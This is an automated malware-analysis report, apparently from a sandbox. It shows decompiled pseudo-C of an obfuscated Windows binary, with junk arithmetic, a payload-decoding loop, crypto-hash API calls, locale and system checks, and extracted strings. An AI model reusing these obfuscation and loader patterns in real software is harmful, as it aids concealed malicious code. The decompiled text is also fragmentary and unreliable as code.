                                                									_t375 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEF50 = E0040489C(_t375);
                                                									_t377 = E004FEED0; // 0xc3c34ef0
                                                									_t473 = _t377 - E004FEF50; // 0xa3b3f6c0
                                                									if(_t473 <= 0) {
                                                										_t378 =  *0x4fef40; // 0x3c79b5d4
                                                										_t379 = _t378 *  *0x4fef4c;
                                                										__eflags = _t379;
                                                										E004FEF10 = _t379;
                                                									} else {
                                                										_t380 = E004FEF00; // 0xa3b3f6c0
                                                										 *0x4feee8 = _t380 + 0x2f;
                                                									}
                                                								}
                                                								_t328 = E004FEF50; // 0xa3b3f6c0
                                                								 *0x4fef40 = _t328 - 0x29;
                                                								if(_v36 - _v36 <= _v36 - _v36) {
                                                									_t332 =  *0x4feed8; // 0x1cb9338e
                                                									 *0x4feee0 = _t332;
                                                								} else {
                                                									_t374 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feecc = _t374;
                                                								}
                                                								_push(0);
                                                								_push( &_v48);
                                                								_push(_v52);
                                                								_push(2);
                                                								_push(_v44);
                                                								if( *0x50597c() != 0) {
                                                									_v36 = 0;
                                                									do {
                                                										_t358 = E004FEF10; // 0x1cb931c0
                                                										 *0x4feecc = _t358;
                                                										_v36 = _v36 + 1;
                                                									} while (_v36 != 4);
                                                									 *0x4feecc = E004F5038( &_v36,  &E004FEF2C,  &_v36,  &E004FEF0C,  &E004FEF34);
                                                									_t361 =  *0x4fef3c; // 0x1cb932a9
                                                									 *0x4feefc = _t361 + E004FEED0;
                                                									asm("fild dword [0x4fef4c]");
                                                									E004FEF10 = E004048CC();
                                                									_t364 =  *0x4feeec; // 0xb52124f2
                                                									 *0x4fef28 = _t364 - 0xe3;
                                                									_t366 = E004FEF34; // 0xc3c34ef0
                                                									E004FEF34 = E0040489C(_t366);
                                                									_v60 = _v52;
                                                									if(_v60 != 0) {
                                                										_v60 =  *((intOrPtr*)(_v60 - 4));
                                                									}
                                                									E004F5358(_v52, _t396, _v60 - 1, _t450, _t451);
                                                								}
                                                								_t337 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4feee8 = _t337;
                                                								 *0x4feefc = 0xf -  *0x4feefc;
                                                								_t340 = E004FEF10; // 0x1cb931c0
                                                								 *0x4fef14 = _t340 + 0xd;
                                                								_t342 =  *0x4feedc; // 0xbc3e19a
                                                								 *0x4fef18 = _t342;
                                                								_t343 =  *0x4fef18; // 0xbc3e19a
                                                								_t481 = _t343 -  *0x4feee8; // 0xdcd0f434
                                                								if(_t481 >= 0) {
                                                									_t344 =  *0x4fef44; // 0x38993
                                                									 *0x4fef18 = _t344 - 0x36;
                                                									__eflags = 0x34;
                                                									 *0x4fef30 = 0x34 -  *0x4feea0;
                                                								} else {
                                                									if(_v36 + _v36 <= _v36) {
                                                										_t354 = E004FEF34; // 0xc3c34ef0
                                                										 *0x4feee8 = _t354;
                                                									} else {
                                                										_t355 =  *0x4fef4c; // 0x43c1493c
                                                										E004FEF50 = _t355 - 8;
                                                									}
                                                								}
                                                								_t348 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef4c = _t348 *  *0x4fef04;
                                                								_t350 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEED0 = _t350 *  *0x4fef3c;
                                                							}
                                                							 *0x4fef28 = E004FEED0 * 0xc4;
                                                							E004FEF20 = E004F356C( &_v36, _t396,  &E004FEF0C,  &_v36,  &_v36);
                                                							_t309 = E004FEF34; // 0xc3c34ef0
                                                							 *0x4fef44 = _t309 + 0xf5;
                                                							_t311 =  *0x4feecc; // 0xd26bafe0
                                                							E004FEF50 = _t311;
                                                							_t312 =  *0x4feefc; // 0x4b08dcc7
                                                							_v72 = _t312 + 4;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feed8 = E004048D8();
                                                						}
                                                						_t255 =  *0x4fef3c; // 0x1cb932a9
                                                						_v72 = _t255 + 0x21;
                                                						asm("fild dword [ebp-0x44]");
                                                						E004FEF20 = E004048CC();
                                                						_t258 =  *0x4feed8; // 0x1cb9338e
                                                						 *0x4fef30 = _t258 -  *0x4fef18;
                                                						_t260 =  *0x4feeec; // 0xb52124f2
                                                						_t485 = _t260 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                						if(_t485 == 0) {
                                                							asm("fild dword [0x4fef38]");
                                                							E004FEF50 = E004048CC();
                                                						}
                                                						E004FEED0 = E004FEED0 - 0x82;
                                                						_t262 = E004FEF00; // 0xa3b3f6c0
                                                						 *0x4feee8 = _t262 - 0x1a;
                                                						 *0x4feecc = E004F356C( &_v36, _t396, 0x4feef0,  &E004FEF2C,  &_v36);
                                                						_pop(_t435);
                                                						 *[fs:eax] = _t435;
                                                						 *0x505980(_v44, E004F6334);
                                                						if(_v36 - _v36 < _v36) {
                                                							_v36 = 0;
                                                							while(_v36 < 0xd) {
                                                								_v36 = _v36 + 1;
                                                								_t288 = E004FEF50; // 0xa3b3f6c0
                                                								 *0x4feecc = _t288;
                                                							}
                                                							_t281 =  *0x4fef4c; // 0x43c1493c
                                                							 *0x4feee8 = _t281;
                                                							_t282 = E004FEED0; // 0xc3c34ef0
                                                							_v72 = _t282 + 0xdb;
                                                							asm("fild dword [ebp-0x44]");
                                                							E004FEF00 = E004048CC();
                                                							E00407678(_v24, 2, 1,  &_v24);
                                                						}
                                                						_t272 =  *0x4fef18; // 0xbc3e19a
                                                						E004FEF2C = _t272;
                                                						asm("fild dword [0x4fef44]");
                                                						E004FEF38 = E004048D8();
                                                						E00407678(_v24, 2, 1,  &_v32);
                                                						E00406CF4( &_v32, L"GetUserDefaultLocaleName");
                                                						_t279 =  *0x4fef14; // 0xb52124ca
                                                						 *0x4feecc = _t279;
                                                						return _t279;
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000254,00000000,00000000,00000001,F0000000,00000000,004F65DC,?,00000000,004F6673), ref: 004F5D08
                                                • CryptCreateHash.ADVAPI32(00000254,00008003,00000000,00000000,0000FDE8,00000000,004F6587,?,?,00000000,004F6673), ref: 004F5DBF
                                                • CryptHashData.ADVAPI32(0000FDE8,?,00000000,00000000,00000000,004F632A,?,00000003,?,?,00000000,004F6673), ref: 004F5E90
                                                • CryptGetHashParam.ADVAPI32(0000FDE8,00000002,00000000,00000000,00000000,00000003,00A1D900,1CB931C0,?,00000003,?,?,00000000,004F6673), ref: 004F5F3C
                                                • CryptGetHashParam.ADVAPI32(0000FDE8,00000002,004F81D9,00000000,00000000), ref: 004F6048
                                                • CryptDestroyHash.ADVAPI32(0000FDE8,004F6334,?,?,00000000,004F6673), ref: 004F6279
                                                • CryptReleaseContext.ADVAPI32(00000254,00000000,00000003,004F6591,?,?,00000000,004F6673), ref: 004F6580
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                • String ID: 5$GetUserDefaultLocaleName$Microsoft.WSMan.Management.dll$`\O$iaspolcy.dll$secur32.dll
                                                • API String ID: 3606780921-435246613
                                                • Opcode ID: 2fd2ff0fd80f40575e78e724da7c3bd145e78b2448da6deb347058f8535cc683
                                                • Instruction ID: 2eed9b999cd030ee7ca33e1ec6f51900c00e0050041dac07e2deacad0d7d184d
                                                • Opcode Fuzzy Hash: 2fd2ff0fd80f40575e78e724da7c3bd145e78b2448da6deb347058f8535cc683
                                                • Instruction Fuzzy Hash: 0E42E5B1910249EFDB00DF6AED85AA977F5FB08306B11443AE505E72B0D779A920CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: f1b40f030405639694847ba2eff25265c7c57a9340bd237086a5ca62e2820a50
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: E23199B2900209CFDB10CF88C884AAEBBF9FF48364F24804AD805A7311C774EA44CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E004096A0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                				char _v8;
                                                				short _v12;
                                                				void* _v16;
                                                				char _v20;
                                                				char _v24;
                                                				void* _t29;
                                                				void* _t40;
                                                				intOrPtr* _t44;
                                                				intOrPtr _t55;
                                                				void* _t61;
                                                
                                                				_push(__ebx);
                                                				_v24 = 0;
                                                				_v20 = 0;
                                                				_t44 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t61);
                                                				_push(0x409760);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t61 + 0xffffffec;
                                                				_t21 =  &_v16;
                                                				L004027F4();
                                                				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                				E004073C4( &_v20, 4,  &_v16);
                                                				E00407508(_t44, _v20, _v8);
                                                				_t29 = E00409568( *_t44, _t44); // executed
                                                				if(_t29 == 0) {
                                                					_v12 = 0;
                                                					E004073C4( &_v24, 4,  &_v16);
                                                					E00407508(_t44, _v24, _v8);
                                                					_t40 = E00409568( *_t44, _t44); // executed
                                                					if(_t40 == 0) {
                                                						E004069A8(_t44);
                                                					}
                                                				}
                                                				_pop(_t55);
                                                				 *[fs:eax] = _t55;
                                                				_push(E00409767);
                                                				E00406A08( &_v24, 2);
                                                				return E004069A8( &_v8);
                                                			}

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,00409760,?,?), ref: 004096D2
                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,00409760,?,?), ref: 004096DB
                                                  • Part of subcall function 00409568: FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 0040959B
                                                  • Part of subcall function 00409568: FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 004095AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                • String ID:
                                                • API String ID: 3216391948-0
                                                • Opcode ID: 6e9cf3b61bff4bb8714ab79a9cff7ac151e9b096445f59aac33c83bfb5e7eaf7
                                                • Instruction ID: aa89d469336c03913e643f7b0c1df1e1c5c07df69510ff936d866d4eb2d40408
                                                • Opcode Fuzzy Hash: 6e9cf3b61bff4bb8714ab79a9cff7ac151e9b096445f59aac33c83bfb5e7eaf7
                                                • Instruction Fuzzy Hash: B3116374A042099BDF04EFA5C992AADB7B8EF45304F50447EB905B32C2D7786E04C769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 46%
                                                			E00409568(char __eax, signed int __ebx) {
                                                				char _v8;
                                                				struct _WIN32_FIND_DATAW _v600;
                                                				void* _t15;
                                                				intOrPtr _t24;
                                                				void* _t27;
                                                
                                                				_push(__ebx);
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t27);
                                                				_push(0x4095c6);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t27 + 0xfffffdac;
                                                				_t15 = FindFirstFileW(E00407330(_v8),  &_v600); // executed
                                                				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                					FindClose(_t15);
                                                				}
                                                				_pop(_t24);
                                                				 *[fs:eax] = _t24;
                                                				_push(E004095CD);
                                                				return E004069A8( &_v8);
                                                			}









                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 0040959B
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 004095AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 9b9a563b2912b8edfb64839b49a3138ec06d3323f4039cba26850e23ecb68daa
                                                • Instruction ID: 8b1d0ab5114d407a2e7d7eccee2b89d38bf928b1e631b0751515de59265f2086
                                                • Opcode Fuzzy Hash: 9b9a563b2912b8edfb64839b49a3138ec06d3323f4039cba26850e23ecb68daa
                                                • Instruction Fuzzy Hash: 78F0B471910204AEC721EB76CD1299EB3ECDB043107510477B804F31C1E6385F109518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040AFF4() {
                                                				intOrPtr _v16;
                                                				struct _SYSTEM_INFO* _t3;
                                                
                                                				GetSystemInfo(_t3); // executed
                                                				return _v16;
                                                			}





                                                0x0040aff8
                                                0x0040b004

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: c213adc8cdc8acd44d56294f2ccb6c512b159a8a22956be17e87cebbbdc84e19
                                                • Instruction ID: 3e7e4f89213da729ec0ca4ef67787ec0f81eedc0c9ce544f57ee4d1411337cff
                                                • Opcode Fuzzy Hash: c213adc8cdc8acd44d56294f2ccb6c512b159a8a22956be17e87cebbbdc84e19
                                                • Instruction Fuzzy Hash: 52A012148084000AC404B72A4D4B40B31801940614FC40725749CA52C2E619866402DF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E004F84E8(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				long _v64;
                                                				void* _v68;
                                                				void* _v72;
                                                				signed int _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v92;
                                                				char _v96;
                                                				char _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v108;
                                                				char _v704;
                                                				intOrPtr _v708;
                                                				char _v712;
                                                				char _v716;
                                                				char _v720;
                                                				char _v724;
                                                				char _v740;
                                                				char _v744;
                                                				char _v748;
                                                				char _v752;
                                                				char _v756;
                                                				char _v760;
                                                				signed int _t501;
                                                				signed int _t502;
                                                				signed int _t509;
                                                				signed int _t518;
                                                				signed int _t519;
                                                				intOrPtr _t523;
                                                				signed int _t524;
                                                				signed int _t525;
                                                				signed int _t526;
                                                				signed int _t533;
                                                				signed int _t539;
                                                				signed int _t540;
                                                				signed int _t541;
                                                				signed int _t545;
                                                				signed int _t546;
                                                				signed int _t556;
                                                				signed int _t557;
                                                				signed int _t559;
                                                				intOrPtr _t563;
                                                				signed int _t569;
                                                				signed int _t571;
                                                				signed int _t572;
                                                				signed int _t574;
                                                				signed int _t576;
                                                				signed int _t581;
                                                				signed int _t588;
                                                				signed int _t589;
                                                				signed int _t590;
                                                				signed int _t593;
                                                				signed int _t598;
                                                				signed int _t601;
                                                				signed int _t603;
                                                				signed int _t609;
                                                				signed int _t611;
                                                				signed int _t612;
                                                				void* _t624;
                                                				signed int _t642;
                                                				signed int _t644;
                                                				signed int _t646;
                                                				signed int _t648;
                                                				void* _t652;
                                                				signed int _t663;
                                                				signed int _t665;
                                                				signed int _t667;
                                                				signed int _t678;
                                                				signed int _t680;
                                                				signed int _t682;
                                                				signed int _t683;
                                                				signed int _t684;
                                                				signed int _t685;
                                                				signed int _t686;
                                                				signed int _t687;
                                                				signed int _t693;
                                                				signed int _t696;
                                                				signed int _t697;
                                                				signed int _t698;
                                                				signed int _t701;
                                                				signed int _t702;
                                                				signed int _t704;
                                                				signed int _t705;
                                                				signed int _t706;
                                                				signed int _t707;
                                                				signed int _t709;
                                                				signed int _t710;
                                                				signed int _t713;
                                                				signed int _t715;
                                                				signed int _t717;
                                                				signed int _t728;
                                                				signed int _t734;
                                                				intOrPtr _t738;
                                                				signed int _t739;
                                                				signed int _t747;
                                                				signed int _t749;
                                                				signed int _t752;
                                                				signed int _t754;
                                                				signed int _t755;
                                                				signed int _t756;
                                                				signed int _t757;
                                                				signed int _t760;
                                                				signed int _t781;
                                                				signed int _t784;
                                                				signed int _t785;
                                                				signed int _t794;
                                                				signed int _t795;
                                                				signed int _t796;
                                                				void* _t802;
                                                				signed int _t807;
                                                				intOrPtr _t808;
                                                				signed int _t812;
                                                				signed int _t822;
                                                				signed int _t825;
                                                				signed int _t828;
                                                				signed int _t829;
                                                				signed int _t830;
                                                				signed int _t839;
                                                				signed int _t840;
                                                				signed int _t843;
                                                				signed int _t845;
                                                				signed int _t847;
                                                				signed int _t862;
                                                				signed int _t867;
                                                				signed int _t872;
                                                				signed int _t875;
                                                				signed int _t877;
                                                				signed int _t878;
                                                				signed int _t882;
                                                				signed int _t886;
                                                				signed int _t888;
                                                				signed int _t889;
                                                				signed int _t891;
                                                				signed int _t899;
                                                				signed int _t903;
                                                				signed int _t912;
                                                				signed int _t913;
                                                				signed int _t914;
                                                				signed int _t919;
                                                				signed int _t921;
                                                				signed int _t924;
                                                				signed int _t926;
                                                				signed int _t928;
                                                				signed int _t934;
                                                				signed int _t937;
                                                				signed int _t944;
                                                				signed int _t945;
                                                				intOrPtr _t946;
                                                				signed int _t949;
                                                				signed int _t950;
                                                				signed int _t952;
                                                				signed int _t953;
                                                				signed int _t954;
                                                				signed int _t956;
                                                				signed int _t957;
                                                				signed int _t969;
                                                				signed int _t970;
                                                				signed int _t972;
                                                				signed int _t974;
                                                				intOrPtr _t976;
                                                				signed int _t978;
                                                				signed int _t983;
                                                				intOrPtr _t984;
                                                				signed int _t985;
                                                				signed int _t986;
                                                				signed int _t990;
                                                				signed int _t1004;
                                                				signed int _t1007;
                                                				signed int _t1013;
                                                				signed int _t1015;
                                                				signed int _t1017;
                                                				signed int _t1018;
                                                				intOrPtr _t1022;
                                                				signed int _t1024;
                                                				signed int _t1025;
                                                				signed int _t1027;
                                                				void* _t1035;
                                                				signed int _t1038;
                                                				signed int _t1044;
                                                				signed int _t1046;
                                                				intOrPtr _t1065;
                                                				signed int* _t1081;
                                                				signed int _t1085;
                                                				signed int _t1086;
                                                				intOrPtr _t1090;
                                                				signed int _t1098;
                                                				intOrPtr _t1111;
                                                				void* _t1119;
                                                				intOrPtr _t1126;
                                                				signed int _t1134;
                                                				signed int _t1145;
                                                				signed int _t1146;
                                                				intOrPtr _t1152;
                                                				intOrPtr _t1153;
                                                				void* _t1163;
                                                				void* _t1169;
                                                				void* _t1172;
                                                				void* _t1179;
                                                				void* _t1185;
                                                				void* _t1201;
                                                				void* _t1205;
                                                				void* _t1207;
                                                				signed int _t1217;
                                                				void* _t1222;
                                                				void* _t1227;
                                                				void* _t1229;
                                                				void* _t1237;
                                                				void* _t1242;
                                                				signed int _t1244;
                                                				void* _t1254;
                                                				void* _t1257;
                                                				void* _t1259;
                                                				void* _t1261;
                                                
                                                				_t1261 = __fp0;
                                                				_t1150 = __esi;
                                                				_t1149 = __edi;
                                                				_t1034 = __ebx;
                                                				_t1152 = _t1153;
                                                				_t1035 = 0x5e;
                                                				do {
                                                					_push(0);
                                                					_push(0);
                                                					_t1035 = _t1035 - 1;
                                                				} while (_t1035 != 0);
                                                				_push(_t1035);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v8 = __eax;
                                                				_push(_t1152);
                                                				_push(0x4f99b2);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1153;
                                                				if(_v8 != 1) {
                                                					__eflags = 0;
                                                					_pop(_t1065);
                                                					 *[fs:eax] = _t1065;
                                                					_push(E004F99B9);
                                                					E004069F0( &_v760);
                                                					E004069A8( &_v756);
                                                					E00406A68( &_v752, 3);
                                                					E004069F0( &_v724);
                                                					E004069A8( &_v720);
                                                					E00406A68( &_v716, 2);
                                                					E00406A08( &_v100, 2);
                                                					return E00406A08( &_v28, 5);
                                                				} else {
                                                					_v52 = _v32 + 0xb2;
                                                					asm("fild dword [ebp-0x28]");
                                                					_v48 = E004048D8();
                                                					if(_v56 + 0x85 >= _v36) {
                                                						asm("fild dword [0x4fef0c]");
                                                						 *0x4feefc = E004048CC();
                                                					} else {
                                                						_v60 = 0;
                                                						do {
                                                							E00406CF4( &_v12, L"ZwQueryOpenSubKeys");
                                                							_v60 = _v60 + 1;
                                                							_t1158 = _v60 - 0xe;
                                                						} while (_v60 != 0xe);
                                                					}
                                                					_push(_v52);
                                                					_push(_v40);
                                                					_push(_v36);
                                                					_t1038 =  *0x4fef30; // 0xa1d816
                                                					E004F5954(_v52, _t1034, _t1038, _v44, _t1158);
                                                					if(E00407774(L"EP0NRE9C.DLL", 1, _v24) < 0x3a) {
                                                						asm("fild dword [0x4feed0]");
                                                						 *0x4fef3c = E004048CC();
                                                					}
                                                					_push(_t1152);
                                                					_push(0x4f9861);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t1153;
                                                					_t501 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4feecc = _t501;
                                                					_t502 = E004FEED0; // 0xc3c34ef0
                                                					E004FEED0 = E0040489C(_t502);
                                                					_v32 = 9 - _v40;
                                                					_v708 = _v56 + 4;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					_v36 = E004048D8();
                                                					_t509 = E004FEF20; // 0x6e687a1a
                                                					 *0x4fef04 = _t509 - 6;
                                                					asm("fild dword [0x4fef18]");
                                                					 *0x4fef28 = E004048CC();
                                                					_v80 = 0xfde8;
                                                					_v60 = 0;
                                                					do {
                                                						E00406CF4( &_v12, _v16);
                                                						if(_v32 - _v52 >= 0xd4) {
                                                							_t518 = _v44 - _v36;
                                                							__eflags = _t518;
                                                							_v40 = _t518;
                                                						} else {
                                                							E004FEED0 = E004F5038( &_v48,  &E004FEF0C,  &E004FEF0C,  &E004FEF10,  &E004FEF20);
                                                						}
                                                						_t519 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4fef14 = _t519;
                                                						_v48 = 0;
                                                						while(_v48 < 4) {
                                                							_v48 = _v48 + 1;
                                                							_t1022 =  *0x4feeec; // 0xb52124f2
                                                							_t1163 = _t1022 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                							if(_t1163 != 0) {
                                                								_t1024 =  *0x4fef40; // 0x3c79b5d4
                                                								_t1025 = _t1024 - E004FEF0C;
                                                								__eflags = _t1025;
                                                								E004FEF20 = _t1025;
                                                							} else {
                                                								_v56 = 0;
                                                								while(_v56 < 0xa) {
                                                									_v56 = _v56 + 1;
                                                									_t1027 = E004FEF00; // 0xa3b3f6c0
                                                									 *0x4feed8 = _t1027;
                                                								}
                                                							}
                                                						}
                                                						_v60 = _v60 + 1;
                                                					} while (_v60 != 0xc);
                                                					_t1168 = 0x5b -  *0x4fef44 - 0x19;
                                                					if(0x5b -  *0x4fef44 < 0x19) {
                                                						_t1017 = E004FEF20; // 0x6e687a1a
                                                						 *0x4feea0 = _t1017;
                                                						_t1145 =  *0x4fef30; // 0xa1d816
                                                						_t1018 =  *0x4fef44; // 0x38993
                                                						E004FEF00 = E004F5234(_t1018, _v48, _t1145, _t1168);
                                                						_t1146 = E004FEF2C; // 0xa1d900
                                                						E004F7B00(_v44, _t1146, _t1168);
                                                					}
                                                					_t523 =  *0x4feeec; // 0xb52124f2
                                                					 *0x4feeec = _t523;
                                                					_t524 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4feef0 = _t524;
                                                					_t525 =  *0x4feef0; // 0x44632301
                                                					_t1169 = _t525 -  *0x4feeec; // 0xb52124f2
                                                					if(_t1169 <= 0) {
                                                						_t526 = E004FEF2C; // 0xa1d900
                                                						E004FEF2C = E0040489C(_t526);
                                                					} else {
                                                						_t1015 =  *0x4fef44; // 0x38993
                                                						E004FEF10 = _t1015 * E004FEF00;
                                                					}
                                                					 *0x4fef44 =  *0x4fef40 * 0xe2;
                                                					E004EDCA8();
                                                					_v48 = _v40;
                                                					_v60 = _v56 - 0x90;
                                                					_t533 =  *0x4fef18; // 0xbc3e19a
                                                					 *0x4fef40 = _t533 + 0x3f;
                                                					 *0x4feecc =  *0x4fef14 * 0xa3;
                                                					if(_v32 - _v56 < 0x44) {
                                                						_t1013 =  *0x4feee0; // 0x747938b
                                                						 *0x4feef0 = _t1013 *  *0x4fef40; // executed
                                                					}
                                                					E004EE96C(_t1034, _t1149, _t1150);
                                                					_t539 =  *0x4fef3c; // 0x1cb932a9
                                                					E004FEF34 = _t539;
                                                					_t540 =  *0x4fef28; // 0x3c79b5d4
                                                					E004FEF38 = _t540;
                                                					_t541 = E004FEF34; // 0xc3c34ef0
                                                					_t1172 = _t541 - E004FEF38; // 0xc3c34fdc
                                                					if(_t1172 < 0) {
                                                						_v60 = 0;
                                                						while(_v60 < 0xf) {
                                                							_v60 = _v60 + 1;
                                                							E00406CF4( &_v12, L"AlpcGetMessageAttribute");
                                                						}
                                                					}
                                                					_v36 = 0;
                                                					while(_v36 < 1) {
                                                						_v36 = _v36 + 1;
                                                						_v40 = _v44 + _v52;
                                                					}
                                                					_v48 = _v32 - _v56;
                                                					_t545 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4fef28 = _t545;
                                                					_t546 =  *0x4feea0; // 0xa1d900
                                                					 *0x4fef3c = _t546 + 0xf8;
                                                					E00407678(_v24, 3, 1,  &_v28);
                                                					_v76 = 0;
                                                					do {
                                                						_v40 = _v32 * _v60;
                                                						_v44 = _v56 + 4;
                                                						_t556 =  *0x4feeec; // 0xb52124f2
                                                						E004FEF10 = _t556;
                                                						_t557 =  *0x4feee8; // 0xdcd0f434
                                                						E004FEF2C = _t557 + 0x22;
                                                						_t559 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef44 = _t559 - 0x86;
                                                						E00406CF4( &_v28, _v28);
                                                						_t563 =  *0x4fefac; // 0x4fe544
                                                						 *((char*)(_t1152 + _v76 - 0x2bc)) =  *((intOrPtr*)(_t563 + _v76 * 4)) - 0x92;
                                                						_v76 = _v76 + 1;
                                                					} while (_v76 != 0x254);
                                                					_v40 = (_v52 << 7) + _v52;
                                                					_t569 =  *0x4feea0; // 0xa1d900
                                                					_t1179 = _t569 +  *0x4fef04 -  *0x4fef04; // 0x43c14963
                                                					if(_t1179 != 0) {
                                                						_t571 = E004FEF50; // 0xa3b3f6c0
                                                						_t572 = _t571 *  *0x4feefc;
                                                						__eflags = _t572;
                                                						E004FEF34 = _t572;
                                                					} else {
                                                						_v44 = _v56 - 0x9b;
                                                						E00406CF4( &_v24, L"sspicli.dll");
                                                						_v32 = 0;
                                                						do {
                                                							if(_v56 + _v32 < _v32 + _v56) {
                                                								_v48 = 0;
                                                								do {
                                                									_t1007 =  *0x4fef48; // 0xc3c34ef0
                                                									 *0x4feea0 = _t1007;
                                                									_v48 = _v48 + 1;
                                                								} while (_v48 != 3);
                                                							}
                                                							_v32 = _v32 + 1;
                                                						} while (_v32 != 0xd);
                                                						_t1004 =  *0x4fef44; // 0x38993
                                                						E004FEF00 = _t1004 - E004FEF20;
                                                					}
                                                					asm("fild dword [0x4fef28]");
                                                					 *0x4feea0 = E004048D8();
                                                					_t574 = E004FEF38; // 0xc3c34fdc
                                                					 *0x4feedc = _t574 + E004FEF38;
                                                					_t576 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feee8 = _t576;
                                                					E004FEF00 = 0x6c - E004FEF20;
                                                					_v68 = E004044B4(0x157a00);
                                                					_t581 = E004FEF38; // 0xc3c34fdc
                                                					_t1185 = _t581 - E004FEF20 - E004FEF38; // 0xc3c34fdc
                                                					if(_t1185 < 0) {
                                                						_v56 = 0;
                                                						while(_v56 < 0) {
                                                							_v56 = _v56 + 1;
                                                							E00406CF4( &_v12, L"SetProcessAffinityMask");
                                                						}
                                                						E00406CF4( &_v12, _v20);
                                                					}
                                                					_v40 = _v52 - _v44;
                                                					_v60 = _v48 + 0xcf;
                                                					if(_v44 <= _v56) {
                                                						_t588 = E004FEF34; // 0xc3c34ef0
                                                						_t589 = _t588 - 0x28;
                                                						__eflags = _t589;
                                                						 *0x4feea0 = _t589;
                                                					} else {
                                                						_t990 = E004FEF20; // 0x6e687a1a
                                                						E004FEF2C = _t990 *  *0x4feee0;
                                                					}
                                                					_t590 =  *0x4feefc; // 0x4b08dcc7
                                                					_v708 = _t590 + 4;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					 *0x4feeec = E004048D8();
                                                					_t593 =  *0x4feefc; // 0x4b08dcc7
